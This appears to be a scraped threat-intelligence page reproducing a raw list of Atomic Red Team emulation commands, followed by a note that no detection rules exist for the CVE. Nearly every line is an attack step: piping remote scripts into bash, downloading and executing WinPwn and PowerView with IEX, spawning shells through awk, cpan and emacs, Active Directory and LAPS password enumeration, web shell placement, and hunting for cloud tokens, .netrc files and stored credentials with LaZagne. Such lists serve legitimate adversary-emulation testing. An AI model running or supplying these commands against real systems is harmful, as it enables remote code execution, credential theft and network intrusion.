wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.